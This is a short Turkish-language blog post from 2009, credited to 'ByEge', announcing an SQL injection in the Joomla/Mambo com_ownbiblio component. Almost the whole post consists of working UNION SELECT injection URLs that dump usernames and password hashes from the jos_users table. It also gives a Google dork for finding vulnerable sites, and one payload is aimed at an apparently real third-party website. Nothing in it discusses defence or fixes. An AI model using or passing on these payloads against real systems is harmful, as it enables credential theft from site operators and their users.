15 Aralık 2009 Salı

Joomla / Mambo com_ownbiblio SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com
Google dork : inurl:com_ownbiblio

http:/localhost/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=-19 UNION SELECT 1,2,group_concat(username,0x3D,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--






http:/localhost/index.php?option=com_ownbiblio&view=catalogue&catid=-19 union all select 1,2,concat(0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25),4,5,6,7,8,9,10,11,12,13,14,15,16  from jos_users--


http://52north.org/index.php?option=com_ownbiblio&view=catalogue&year=All&catid=-19 UNION SELECT 1,2,group_concat(username,0x3D,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from jos_users--

Hiç yorum yok :

Yorum Gönderme